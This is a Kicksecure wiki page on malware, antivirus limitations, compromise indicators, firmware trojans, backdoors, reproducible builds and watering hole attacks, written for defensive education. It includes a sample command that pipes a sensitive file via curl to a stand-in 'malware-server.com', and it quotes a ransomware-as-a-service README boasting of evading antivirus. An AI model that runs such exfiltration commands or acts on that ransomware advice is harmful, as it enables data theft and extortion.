Malware, Computer Viruses, Firmware Trojans and Antivirus Scanners

From Kicksecure
Jump to navigation Jump to search

  • Virus is often used as a synonym for malware.
  • Computer infections include viruses, trojan horses, spyware, ransomware and other categories of malware.
  • Malware stands for malicious software. A computer virus is a an undesirable program running on the user's computer often without their consent or even without their knowledge.
  • Preventing malware infections is very important because malware can steal your identity, passwords, accounts, impersonate you, steal all your private data, you risk getting SWATTed and more.
  • Computer security, a computer that is free of malware, requires a security concept. Just only installing an antivirus scanner is insufficient.
  • Detection and removal of malware is a hard problem. The utility of antivirus tools is actually rather limited. A much safer security concept needs to focus on prevention of malware infections, not on malware detection.

Malware[edit]

The Importance of a Malware Free System[edit]

Malware has malicious intent and can potentially: [1]

  • View and take snapshots of the desktop.
  • Peruse files and folders.
  • Gain access to protected data when decrypted.
  • Exfiltrate, corrupt or destroy data (particularly financial and personal information).
  • Plant fabricated evidence.
  • Damage operating system functionality.
  • Encrypt the data of a drive(s) and demand payment for decryption (ransomwarearchive.org).
  • Display unwanted advertising.
  • Install unwanted software.
  • Install persistent rootkitsarchive.org or backdoorsarchive.org.
  • Track browsing and other behaviour.
  • Remotely turn on webcams and microphones.
  • Create "zombie" computers which form part of a botnet for spam email, DDOS attacksarchive.org or the hosting of illicit / illegal material which might result in getting SWATtedarchive.org.
  • Record everything a user types, sends and receives.

Info The integrity of the host is a critical part of the system's Trusted Computing Basearchive.org. If the host system is compromised by malwarearchive.org, so is every virtual machine (VM).

Kicksecure Antivirus[edit]

  1. Kicksecure is based on Debian and using the Linux kernel. There exists much less malware for Linux generally.
  2. Kicksecure comes with many security featuresarchive.org.
  3. The more you know, the safer you can be. See Documentation.

Targeted Malware vs Off-The-Shelf Malware[edit]

Targeted malware is the opposite of off-the-shelf malware. Targeted malware is specifically crafted against a known target to attack a specific system or limited amount of systems only. The goal is to avoid detection by not being installed on too many systems where qualified people might detect the malware and publish the findings.

On the other hand, off-the-shelf malware attempts to spread in bulk against larger groups or the general public with the goal of taking over as many systems as possible. It should be noted that malware tools are widely available, with proof-of-concept ransomware even existing on GitHub at the time of writing. For example, the "DemonWare" tool can be utilized to create malicious payloads for ransomware, adware or general malware purposes on the Windows, Linux and macOS platforms: [2]

Your Ransomware As A Service (RAAS) Tool for all your hacking needs. ... This was made to demonstrate ransomware and how easy it is to make. It works on Windows, Linux and MacOS. It's recommended to compile payload.py to EXE to make it more portable. ... This script does not get detected by any anti-virus. Self made scripts go undetected 99% of the time. It's easy to write something nasty like ransomware, adware, malware, you name it. ... I recommend a VPN that allows port forwarding (For example; PIA VPN) when using this outside your network, or better, a cloud computer hosted elsewhere, like Amazon AWS. The conclusion of this project is that it is easy to brick a system and earn money doing it. This script doesn't use any exploits to achieve its goal, but can easily be coded into it as a nice feature.

Malware creators are likely to utilize existing software samples to create more pernicious tools with features like: greater payload customization (custom files), man-in-the-middle and DNS poisoning (website redirection), email payloads and email spoofing, anti-virus or other detection warnings, focused data gathering (passwords or other sensitive files), detection of mounted drives (for encryption), encrypted transfer of traffic between payloads and malicious servers, and much more.

The Utility of Antivirus Tools[edit]

Antivirus products and personal firewallsarchive.org are not drop in solutions for a secure host. Malware can often stay undetected and evade scans, while application level personal firewalls are often circumvented. [3] Polymorphic codearchive.org and rootkitsarchive.org essentially render antivirus products helpless. [4] [5]

The following paragraph is currently being discussed.archive.org

Antivirus tools are actually worse than useless. In the case of sophisticated and targeted attacks, the antivirus software can serve as a pathway to exploiting a system's kernel, since they almost always run with administration level privileges. [6] Some antivirus software also harms privacy by sending system files back to the company servers for analysis. [7] The software also actively conducts man-in-the-middle attacks on secure SSL connections, enabling very sensitive information to be inspected. [8]

https://privsec.dev/posts/knowledge/badness-enumeration/#antivirusesarchive.org

Preventing Malware Infections[edit]

The optimal scenario is to avoid infection by malware in the first place. Once malicious code has accessed a system, it is next to impossible to contain. Sensible steps include: hardening the operating system, carefully vetting programs and files that are retrieved from the Internet, using hypervisors (virtualizers) to isolate software that processes untrusted data, and periodically deleting and recreating virtual machines that are used for sensitive operations. [9]

In the event a system compromise is strongly suspected or confirmed, the ultimate goal is to re-establish a trusted, private environment for future activities -- see Compromise Recovery for techniques to recover from Kicksecure (host or VM) infections.

Detecting Malware Infections[edit]

Detecting off-the-shelf (standardized) malware is a very hard problem and conceptually a lost cause.

The inconvenient and somehow embarrassing truth for us - the malware experts - is that there does not exist any reliable method to determine if a given system is not compromised. True, there is a number of conditions that can warn us that the system is compromised, but there is no limit on the number of checks that a system must pass in order to be deemed “clean”.Joanna Rutkowska, security researcher and founder of Qubes OSarchive.org

If uncustomized malware is widespread enough, then it has a chance of being detected by a technician. Targeted malware might also get detected by a technician, but the likelihood is low unless they are lucky or gifted.

Non-technical users do not have many good options. They can either:

  • Spend a few years to rapidly increase their knowledge base of operating systems, network protocols, package analysis, programming, disassembly etc., and then try their luck.
  • Pay exorbitant sums to a technician to try and find system malware, even though there is no certainty of success. [10] [11]
  • Or seek the voluntary assistance of a technician to find malware, if they are both a high value target and have a reasonable rationale for why they are likely compromised. [12]

Finding Vulnerabilities[edit]

Finding vulnerabilitiesarchive.org in software is a complex task. A deep understanding of the source code, the ability to interpret disassembly, and/or proficiency with specialized tools (like static or dynamic analysis tools such as valgrind) are essential. Often, these skills are beyond the reach of typical users, making it primarily a domain for software developers and security researchers.

Examples:

Valid Compromise Indicators versus Invalid Compromise Indicators[edit]

If trivial changes are noticed on your system -- such as a duplicate desktop icon -- this is not evidence of malware, a hack, or leak. Similarly, if warning or error messages appear that are difficult to understand, in most cases there is no need for panic. If something unexpected occurs such as the appearance of a "htaccess file in home directory", or graphical glitches emerge in some applications, then it is more likely a harmless bug and/or usability issue rather than a compromise. Never in the history of malware analysisarchive.org, security researchers relied on unexpected occurrences such as duplicate desktop icons. Malware analysis is a skill that requires studying malware detection techniques. It's not a skill that can be casually picked up by pure observation and guesswork.

Skilled attackers do not leave such obvious traces of their breach. An infection by tailored malware is more plausible in this scenario, and this is virtually impossible to detect by reading random messages in system logs. Even malware that is bought off-the-shelf (malware building toolkits) is unlikely to be discovered by cursory inspections. [13] Rootkitarchive.org technology is no doubt a standard feature of the various programs.

Strange files, messages, or other system behavior could feasibly relate to an attacker wanting the user to find something. However, the likelihood of this kind of harassment is considered low. Script kiddiesarchive.org ("skiddies") are unskilled attackers who use scripts or programs to conduct attacks on computer systems and networks, most often with juvenile outcomes. For example, they might use programs to remotely control poorly-secured Microsoft Windows desktops, trolling their victims from an open, forced chat window, opening their DVD drive, and so on. It is improbable that skiddies can achieve similar exploits against Linux, Xen, or BSD platforms. [14] Sophisticated attackers (who are likely to use tailored malware) generally avoid detection unless the user is unlucky enough to be a victim of Zersetzungarchive.org (a psychological warfare technique).

How malware actually works: Contrary to popular belief, most sophisticated malware operates in a way that is designed to avoid detection by the user entirely. A common misconception is that malware will cause noticeable changes to the system, such as altering the desktop background, changing visual styles, moving windows around, or switching the default applications of the operating system. In reality, effective malware is far more subtle.

For instance, a piece of malware designed to steal data might execute a command to upload sensitive files to a remote server without altering the system in a way that would draw attention. Consider the following example:

cat sensitive_file.txt | curl -X POST -d @- http://malware-server.com/upload

In this example, the command reads the contents of a file (in this case, sensitive_file.txt) and immediately uploads it to a malicious server (malware-server.com). This entire operation can occur silently in the background, with no visible signs to the user that something is amiss. At no point during this process are there user-noticeable changes. The malware's success hinges on its ability to remain invisible, operating quietly behind the scenes while carrying out its malicious activities.

Every forum post and support request requires time that could otherwise be directed to Kicksecure development. Unless there is genuine evidence of a serious and credible problem, there is no need for a new post. See also Support Request Policy (rationale). Developers and the Kicksecure community at large do not have enough time to explain every message that Linux might report. In most cases, they are not important and outside the control of Kicksecure developers.

False-Positive Antivirus Reports[edit]

When an antivirus program reports having found a virus or other issue, it doesn't necessarily mean that there is an actual issue. According to AV comparativesarchive.org and many other sources, there are false-positive reports, also known as false alarms. For example, you can see the results of the False Alarm Test March 2022archive.org. A virus or issue found report is, at best, an indication that there could be an issue, but there is no definitive proof.

Furthermore, the usefulness of antivirus reports is limited because, for most (if not all) commercial vendors of antivirus software, it is not easy or even impossible for the user and outside developers to get in contact with a malware analystarchive.org at the antivirus company to receive further information, virus confirmation, bug reports, and so forth.

This issue is exacerbated by commercial antivirus software and their database, which are usually closed sourcearchive.org or even obfuscatedarchive.org. Therefore, even outside developers have a hard time investigating virus reports.

Proofing an Actual Security Vulnerability[edit]

To prove that there is an actual security issue, more than a report by an antivirus scanner is required. This is due to the possibility of false alarms by antivirus software.

Proof of actual vulnerabilities could include showing a code issue in the source codearchive.org, in the disassemblyarchive.org, malicious behavior in a debuggerarchive.org, a capture of the network traffic from a packet analyzerarchive.org or proof of concept (PoC)archive.org exploitarchive.org.

Attribution of Security Vulnerabilities to Software[edit]

If a file is reported as infected by a virus scanner it does not necessarily follow that the reported file is the origin of the virus. This is due to file-infecting viruses.

What is a file-infecting virus? A file-infecting virus is a type of malware that infects files with the intent to cause permanent damage, make them unusable or spread itself to make detection and removal of the virus harder. A file-infecting virus injects its own code into different files.

False-Positive Log Reports[edit]

Info Reminder: Kicksecure is not perfect. The security issues facing society are great, but there are few volunteers who are seriously investing the effort to challenge and resolve them.

Users with a serious intention to research these issues are encouraged to assist in accordance with their skills. Testing, bug reporting or even bug fixing are laudable endeavors. If this process is unfamiliar, understand that about thirty minutes is required per message / identifier to ascertain if the discovered result [15] is a false positive, regression, known or unknown issue.

It is unhelpful to ask questions in forums, issue trackers and on various mailing lists with concerns that have already been discussed, or which are known issues / false positives. In all cases, please first search thoroughly for the result that was found. Otherwise, the noise to signal ratio increases and Kicksecure development is hindered. Users valuing security don't want this, otherwise this would violate the aforementioned assumption.

If something is identified that appears to be a Kicksecure-specific issue, please first read the Self Support First Policy before making a notification.

Firmware Trojans[edit]

Info Once a user is infected with very sophisticated malware that modifies low-level firmware, it is extremely difficult to detect in almost all cases.

Firmware infections should not be confused with hardware/circuit trojansarchive.org, which are malicious modifications made to machine components during the manufacturing process. Despite their sophistication, circuit trojans are not immune to detection. [16]

Virtualizers and Hardware Compromise[edit]

Virtualizers like Qubes, VirtualBox and KVM cannot absolutely prevent the compromise of hardware. Running all activities inside VMs is a very reasonable approach. However, this only raises the bar and makes it more difficult and/or expensive to compromise the whole system. It is by no means a perfect solution.

No distribution of Linux, BSD, Xen or any other variant can solve the issue of needing to dispose of potentially infected hardware. Hardware-specific issues can really only be fixed at the hardware level. At best, software interventions can only provide workarounds.

The Promise of Libre Firmware[edit]

The problem is no hardware exists that consists of entirely Libre firmware. It is very difficult to analyze the firmwarearchive.org of hardware, wipe potentially compromised versions, or overwrite firmware with a most-likely-clean version.

Even if a user wholly depended on Libre firmware, this would only make verification easier but it could not stop infection. Disassembling hardware components -- BIOS, disk controllers, CPU, Intel AMT and so on -- and flashing them with clean versions offline is extremely difficult. It is simply cheaper and more convenient to buy new hardware.

The bundling of undesirable anti-features like DRM in closed firmware is further evidence that Libre firmware is needed, in addition to Libre hardware designsarchive.org.

A hypothetical stateless computer [17] [18] would solve the problem of malware persistence, but it still could not protect against the damage (data-exfiltration) caused by successful exploitation.

Backdoors[edit]

Non-Freedom Software (precompiled binaries) should be avoided. because it is easier to hide backdoors. Freedom Software (source-available) should be preferred because it is more difficult to hide backdoors.

Table: Finding Backdoors in Freedom Software vs Non-Freedom Software

Non-Freedom Software (precompiled binaries) Freedom Software (source-available)
Original source code is reviewable No Yes
Compiled binary file can be decompiled into disassembly Yes Yes
Regular pre-compiled binaries Depends [19] Yes
Obfuscationarchive.org (anti-disassembly, anti-debugging, anti-VM) [20] is usually not used Depends [21] Yes [22]
Price for security audit searching for backdoors Very high [23] Lower
Difference between precompiled version and self-compiled version Unavailable [24] Small or none [25]
Reverse-engineeringarchive.org is not required No Yes
Assembler language skills required Much more Less
Always legal to decompile / reverse-engineer No [26] [27] Yes [28]
Possibility of catching backdoors via observing incoming/outgoing Internet connections Very difficult [29] Very difficult [29]
Convenience of spotting backdoors Lowest convenience [30] Very high convenience [31]
Difficulty of spotting intentional, malicious backdoors [32] [33] Much higher difficulty [34] Much lower difficulty [35]
Difficulty of spotting a "bugdoor" [36] Much higher difficulty [37] Lower difficulty
Third parties can legally release a software forkarchive.org, a patched version without the backdoor No [38] Yes [39]
Third parties can potentially make (possibly illegal) modifications like disabling serial key checks [40] Yes Yes
Software is always modifiable No [41] Yes
Third parties can use static code analysis tools No Yes
Third parties can judge source code quality No Yes
Third parties can find logic bugs in the source code No Yes
Third parties can find logic bugs in the disassembly Yes Yes
Benefits from population-scale scrutiny No Yes
Third parties can benefit from debug symbolsarchive.org during analysis Depends [42] Yes
Display source code intermixed with disassembly No Yes [43]
Effort to audit subsequent releases Almost same [44] Usually lower [45]
Forum discussion: Finding Backdoors in Freedom Software vs Non-Freedom Softwarearchive.org

Spotting backdoors is already very difficult in Freedom Software where the full source code is available to the general public. Spotting backdoors in non-freedom software composed of obfuscated binaries is exponentially more difficult. [46] [47] [48] [49] [50] [51] [52] [53] [54]

To further improve the situation in the future, the Freedom Software community is working on the Reproducible Buildsarchive.org project. Quote:

Reproducible builds are a set of software development practices that create an independently-verifiable path from source to binary code.

Whilst anyone may inspect the source code of free and open source software for malicious flaws, most software is distributed pre-compiled with no method to confirm whether they correspond.

This incentivises attacks on developers who release software, not only via traditional exploitation, but also in the forms of political influence, blackmail or even threats of violence.

This is particularly a concern for developers collaborating on privacy or security software: attacking these typically result in compromising particularly politically-sensitive targets such as dissidents, journalists and whistleblowers, as well as anyone wishing to communicate securely under a repressive regime.

Whilst individual developers are a natural target, it additionally encourages attacks on build infrastructure as an successful attack would provide access to a large number of downstream computer systems. By modifying the generated binaries here instead of modifying the upstream source code, illicit changes are essentially invisible to its original authors and users alike.

The motivation behind the Reproducible Builds project is therefore to allow verification that no vulnerabilities or backdoors have been introduced during this compilation process. By promising identical results are always generated from a given source, this allows multiple third parties to come to a consensus on a “correct” result, highlighting any deviations as suspect and worthy of scrutiny.

This ability to notice if a developer has been compromised then deters such threats or attacks occurring in the first place as any compromise would be quickly detected. This offers comfort to front-liners that they not only can be threatened, but they would not be coerced into exploiting or exposing their colleagues or end-users.

Several free software projectsarchive.org already, or will soon, provide reproducible builds.


Vulnerability versus Malicious Backdoor[edit]

The word "backdoor" is not well defined. A vulnerability (or "bugdoor") can serve as a backdoor. Hence, many people use the terms vulnerability and backdoor as synonyms. This however confuses the boundaries between vulnerability "malicious backdoors", for which now a stronger word than just only "backdoor" must be used.

Vulnerability Example[edit]

Bad (buffer overflow vulnerability):

char buf[10]; fgets(buf, sizeof(buf) - 1, stdin);

Good example pseudo code (not vulnerable to buffer overflow):

char buf[10]; fgets(buf, sizeof(buf), stdin);

Just a small code difference. Can be introduced by mistake, which happens a lot or intentionally.

Malicious Backdoor[edit]

Malicious backdoor pseudocode example:

# If the wallet balance is greater than 100, steal it.
if wallet_balance >= 100
  send_to_hacker("1HackerBTCAddressHere", wallet_balance)
end
# Otherwise, do nothing.

It's expressive. It's targeted. It's intentional. Direct evidence.

Bitpay Wallet Malicious Backdoor[edit]

Bitpay Wallet at the time was called Copay Bitcoin Wallet. It had an interesting backdoor.

If more than 100 BTC, steal it. Otherwise, don't bother.

sources: [55]

Malware Audits[edit]

It is theoretically possible to discover malware by comparing an already used/booted, supported VM image such as a VirtualBox .ova image or Qubes template with the original. However, at the time of writing this is infeasible for Kicksecure developers.

Quote security researcher, Joanna Rutkowska, founder of Qubes OSarchive.org:

The inconvenient and somehow embarrassing truth for us – the malware experts – is that there does not exist any reliable method to determine if a given system is not compromised. True, there is a number of conditions that can warn us that the system is compromised, but there is no limit on the number of checks that a system must pass in order to be deemed “clean”.

Professional malware audits require a completely different skill set to software development, such as forensic and research capabilities, along with a laboratory facility. An analogy is expecting a professional chef to identify the source and quality of every ingredient used in an already cooked meal; this expectation is completely unrealistic. Like most, if not all Linux distributions, Kicksecure relies upon many different software packages which are developed by countless independent parties; see Linux User Experience versus Commercial Operating Systems to learn more about the Linux organizational structure.

The likelihood of discovering purposeful modifications is low until fully reproducible buildsarchive.org (or at least Verifiable Builds) are available. Presently there is not a single Linux distribution installation whose image can be re-built deterministically by independent third parties. That means introduced modifications cannot be easily discovered during the compilation process. As the Reproducible Builds project has stated:

The motivation behind the Reproducible Builds project is therefore to allow verification that no vulnerabilities or backdoors have been introduced during this compilation process.

As the Qubes OS projectarchive.org has stated:

(A “rebuilder” is a program that takes a binary and its purported source code as inputs, along with any applicable metadata, and attempts to build an identical binary from the source code. The goal is to check whether the binary was really compiled from its claimed source code.)

Proper malware audit capabilities are conditional upon several key milestones:

  1. Completion of Debian's Reproducible Buildsarchive.org project -- 91% of packages currently build reproducibly in Debian bullseye.
  2. All packages build reproducibly in Debian and other Linux distributions.
  3. The Linux distribution policy mandates package repoducibility.
  4. Independent package rebuilders become available.
  5. Note that reproducible package builds are not equivalent to reproducible installed packages. [56]
  6. The Reproducible Builds project works towards reproducible installation CD/DVD images. [57]
  7. Independent installation image rebuilders become available.
  8. Reproducible VM images become feasible.
  9. Independent VM image rebuilders become available.
  10. Auditing already used (VM) images is increasingly feasible.

To date only the first milestone has been partially accomplished. Completing the remaining prerequisite milestones will probably take many years of difficult engineering work.

See also:

Watering Hole Attacks[edit]

It should be noted that advanced malware can infect a user's computer via a Watering Hole Attackarchive.org. This vector has similarities to the software version of a Supply Chain Attack, and these methods are not mutually exclusive: [58]

A watering hole attack is a malware attack in which the attacker observes the websites often visited by a victim or a particular group, and infects those sites with malware. A watering hole attack has the potential to infect the members of the targeted victim group. Although uncommon, a watering hole attack does pose a significant threat to websites, as these attacks are difficult to diagnose.

In the case of Kicksecure users, any future attempt would logically target hosted content on GitHub, SourceForge, various forum locations, mirrors, popular documentation links, and frequently visited security and anonymity sites like Tails, The Tor Project and so on. [59] The hope is that developers, contributors and general users of the software become infected with stealthy malware that is immune to detection.

The attack involves a few steps: [58] [60]

  1. Zero-day or other vulnerabilties target the website software.
  2. Malicious JavaScript or HTML are most often used to inject malicious programming code.
  3. The code redirects visitors to a different site that serves "malvertisments" or malware masquerading as legitimate software.
  4. Once installed, the malware can infect various members of the targeted group.

It should be noted that advanced adversaries are capable of gaining knowledge about the behavioral patterns of target groups -- where they congregate, topics of research, related interests, and handle mapping of anonymous networks. This generic browsing and membership knowledge, along with observed security practices, greatly narrows the number of specific sites that need be targeted and the suitable attack mode. One way to mitigate this threat is to rigorously inspect websites for malicious code.

Interested readers can learn about six recent watering hole attacks targeting the US, China, banks and other entities herearchive.org.

See Also[edit]

References[edit]

  1. https://en.wikipedia.org/wiki/Malwarearchive.org
  2. https://github.com/junseul/Ransomware_RAASNet/blob/master/RAASNet.pyarchive.org
  3. https://www.grc.com/lt/leaktest.htmarchive.org
  4. https://arstechnica.com/security/2014/05/antivurus-pioneer-symantec-declares-av-dead-and-doomed-to-failure/archive.org
  5. A botnet author brags in this thread of writing unbeatable malware and trolling antivirus vendors.archive.org
  6. https://theintercept.com/2015/06/22/nsa-gchq-targeted-kaspersky/archive.org
  7. https://www.schneier.com/blog/archives/2017/10/more_on_kaspers.htmlarchive.org
  8. https://bugs.chromium.org/p/project-zero/issues/detail?id=978archive.org
  9. For instance, in Kicksecure for Qubes this would involve the occasional deletion and recreation of Kicksecure AppVMs.
  10. The salary costs for a security researcher / malware analyst over an extended period rule this out for most individuals.
  11. https://forums.whonix.org/t/document-recovery-procedure-after-compromise/3296/12archive.org
  12. Only a select group of people fall into this group, for instance, whistleblowers targeted and infected by targeted viruses. Experts might be located who are willing to conduct analysis pro bono; later publicizing their findings for the public benefit.
  13. Interested readers can verify these claims by researching off-the-shelf malware building toolkits. They are dangerous to install for inexperienced users, but there is a wealth of information online such as screenshots and video tutorials.
  14. It is unclear if script kiddie programs are readily available for attacking non-Microsoft Windows users.
  15. From a browser test website, in a log file and so on.
  16. https://en.wikipedia.org/wiki/Hardware_Trojan#Detectionarchive.org
  17. https://blog.invisiblethings.org/2015/12/23/state_harmful.htmlarchive.org
  18. https://github.com/rootkovska/state_harmful/blob/master/state_harmful.mdarchive.org
  19. Some use binary obfuscators.
  20. https://resources.infosecinstitute.com/topic/anti-disassembly-anti-debugging-and-anti-vm/archive.org
  21. Some use obfuscation.
  22. An Open Source application binary could be obfuscated in theory. However, depending on the application and the context -- like not being an Open Source obfuscator -- that would be highly suspicious. An Open Source application using obfuscators would probably be criticized in public, get scrutinized, and lose user trust.
  23. This is because non-freedom software is usually only available as a pre-compiled, possibly obfuscated binary. Using an anti-decompiler:
    • Auditors can only look at the disassembly and cannot compare a pre-compiled version from the software vendor with a self-compiled version from source code.
    • There is no source code that is well-written, well-commented, and easily readable by design.
  24. Since there is no source code, one cannot self-build one's own binary.
    • small: for non-reproducible builds (or reproducible builds with bugs)
    • none: for reproducible builds
  25. Decompilation is often expressly forbidden by license agreements of proprietary software.
  26. Skype used DMCA (Digital Millenium Copyright Act) to shut down reverse engineering of Skypearchive.org
  27. Decompilation is always legal and permitted in the license agreements of Freedom Software.
  28. 29.0 29.1 This is very difficult because most outgoing connections are encrypted by default. At some point the content must be available to the computer in an unencrypted (plain text) format, but accessing that is not trivial. When running a suspected malicious application, local traffic analyzers like Wiresharkarchive.org cannot be trusted. The reason is the malicious application might have compromised the host operating system and be hiding that information from the traffic analyzer or through a backdoor. One possible option might be running the application inside a virtual machine, but many malicious applications actively attempt to detect this configuration. If a virtual machine is identified, they avoid performing malicious activities to avoid being detected. Ultimately this might be possible, but it is still very difficult.
  29. It is necessary to decompile the binary and read "gibberish", or try to catch malicious traffic originating from the software under review. As an example, consider how few people would have decompiled Microsoft Office and kept doing that for every upgrade.
  30. It is possible to:
    1. Audit the source code and confirm it is free of backdoors.
    2. Compare the precompiled binary with a self-built binary and audit the difference. Ideally, and in future, there will be no difference (thanks to the Reproducible Builds project) or only a small difference (due to non-determinism introduced during compilation, such as timestamps).
  31. An example of a malicious backdoor is a hardcoded username and password or login key only known by the software vendor. In this circumstance there is no plausible deniability for the software vendor.
  32. List of malicious backdoors in wikipediaarchive.org.
  33. Requires strong disassembly auditing skills.
  34. If for example hardcoded login credentials were in the published source code, that would be easy to spot. If the published source code is different from the actual source code used by the developer to compile the binary, that difference would stand out when comparing pre-compiled binaries from the software vendor with self-compiled binaries by an auditor.
  35. A "bugdoor" is a vulnerability that can be abused to gain unauthorized access. It also provides plausible deniability for the software vendor. See also: Obfuscated C Code Contestarchive.org.
  36. Such issues are hard to spot in the source code, but even harder to spot in the disassembly.
  37. This is forbidden in the license agreement. Due to lack of source code, no serious development is possible.
  38. Since source code is already available under a license that permits software forks and redistribution.
  39. This entry is to differentiate from the concept immediately above. Pre-compiled proprietary software is often modified by third parties for the purposes of privacy, game modifications, and exploitation.
  40. For example, Intel ME could not be disabled in Intel CPUs yet. At the time of writing, a Freedom Software re-implementation of Intel microcode is unavailable.
  41. Some may publish debug symbols.
  42. It is possible to review the disassembly, but that effort is duplicated for subsequent releases. The disassembly is not optimized to change as little as possible or to be easily understood by humans. If the compiled version added new optimizations or compilation flags changed, that creates a much bigger diffarchive.org of the disassembly.
  43. After the initial audit of a source-available binary, it is possible to follow changes in the source code. To audit any newer releases, an auditor can compare the source code of the initially audited version with the new version. Unless there was a huge code refactoring or complete rewrite, the audit effort for subsequent versions is lower.
  44. The consensus is the assembler low levelarchive.org programming language is more difficult than other higher level abstractionarchive.org programming languages. Example web search terms: assembler easy, assembler easier, assembler difficult.
  45. Source code written in higher level abstraction programming languages such as C and C++ are compiled to object codearchive.org using a compiler. See this articlearchive.org for an introduction and this imagearchive.org. Source code written in lower level abstraction programming language assembler is converted to object code using an assembler. See the same article above and this imagearchive.org. Reverse engineering is very difficult for a reasonably complex program that is written in C or C++, where the source code is unavailable; that can be deduced from the high price for it. It is possible to decompile (meaning re-convert) the object code back to C with a decompiler like Boomerangarchive.org. To put a price tag on it, consider this quote -- Boomerang: Help! I've lost my source codearchive.org:

    How much will it cost? You should expect to pay a significant amount of money for source recovery. The process is a long and intensive one. Depending on individual circumstances, the quality, quantity and size of artifacts, you can expect to pay upwards of US$15,000 per man-month.

  46. The following resources try to solve the question of how to disassemble a binary (byte code) into assembly source code and re-assemble (convert) to binary.

    1. Take a hello world assembler source code.

    2. Assemble.

    nasm -felf64 hello.asm

    3. Link.

    ld hello.o -o hello

    4. objdump (optional).

    objdump -d hello

    5. Exercise for the reader: disassemble hello and re-assemble.

  47. The GNU Helloarchive.org program source file hello.carchive.org at the time of writing contains 170 lines. The objdump -d /usr/bin/hello on Debian buster has 2757 lines.

    Install package(s) hello following these instructions

    1 Platform specific notice.

    2 Update the package lists and upgrade the system The Web Archive Onion Version .

    sudo apt update && sudo apt full-upgrade

    3 Install the hello package(s).

    Using apt command line --no-install-recommends option The Web Archive Onion Version is in most cases optional.

    sudo apt install --no-install-recommends hello

    4 Platform specific notice.

    5 Done.

    The procedure of installing package(s) hello is complete.

    objdump -d /usr/bin/hello

    2757
    
  • For example, consider how difficult it was to reverse engineer Skype: Skype Reverse Engineering : The (long) journey ;)..archive.org
    • Consider all the Debian package maintainer scripts. Clearly these are easier to review as is, since most of them are written in sh or bash. Review would be difficult if these were converted to a program written in C, and were closed source and precompiled.
    • Similarly, it is far preferable for OnionShare to stay Open Source and written in python, rather than the project being turned into a precompiled binary.
  • Salary comparison ($K):
  • It is obvious the cost of a security audit involving reverse engineering will be far greater than for source-available code.
  • Quote research paper Android Mobile OS Snooping By Samsung, Xiaomi, Huawei and Realme Handsetsarchive.org:

    Reverse Engineering A fairly substantial amount of non-trivial reverse engineering is generally required in order to decrypt messages and to at least partially decode the binary plaintext. 1) Handset Rooting: The first step is to gain a shell on the handset with elevated privileges, i.e. in the case of Android to root the handset. This allows us then to (i) obtain copies of the system apps and their data, (ii) use a debugger to instrument and modify running apps (e.g. to extract encryption keys from memory and bypass security checks), and (iii) install a trusted SSL root certificate to allow HTTPS decryption, as we explain below. Rooting typically requires unlocking the bootloader to facilitate access to the so-called fastboot mode, disabling boot image verification and patching the system image. Unlocking the bootloader is often the hardest of these steps, since many handset manufacturers discourage bootloader unlocking. Some, such as Oppo, go so far as to entirely remove fastboot mode (the relevant code is not compiled into the bootloader). The importance of this is that it effectively places a constraint on the handset manufacturers/ mobile OSes that we can analyse. Xiaomi and Realme provide special tools to unlock the bootloader, with Xiaomi requiring registering user details and waiting a week before unlocking. Huawei require a handset-specific unlock code, but no longer supply such codes. To unlock the bootloader on the Huawei handset studied here, we needed to open the case and short the test point pads on the circuit board, in order to boot the device into the Huawei equivalent of Qualcomm’s Emergency Download (EDL) mode. In EDL mode, the bootloader itself can be patched to reset the unlock code to a known value (we used a commercial service for this), and thereby enable unlocking of the bootloader.

    Decompiling and Instrumentation On a rooted handset, the Android application packages (APKs) of the apps on the /system disk partition can be extracted, unzipped and decompiled. While the bytecode of Android Java apps can be readily decompiled, the code is almost always deliberately obfuscated in order to deter reverse engineering. As a result, reverse engineering the encryption and binary encoding in an app can feel a little like exploring a darkened maze. Perhaps unsurprisingly, this is frequently a time-consuming process, even for experienced researchers/practitioners. It is often very helpful to connect to a running system app using a debugger, so as to view variable values, extract encryption keys from memory, etc.

    The research paper describes in far more detail the highly complicated technical challenges of reverse engineering.

  • Many files in /etc or /var are auto generated at package installation time.
  • This is a prerequisite for at least partially reproducible installed packages which are required by the installer.
  • 58.0 58.1 https://www.techopedia.com/definition/31858/watering-hole-attackarchive.org
  • More commonly attacks favor banks, large organizations and government offices due to the obvious political and profit motives.
  • https://en.wikipedia.org/wiki/Watering_hole_attackarchive.org
  • We believe security software like Kicksecure needs to remain Open Source and independent. Would you help sustain and grow the project? Learn more about our 12 year success story and maybe DONATE!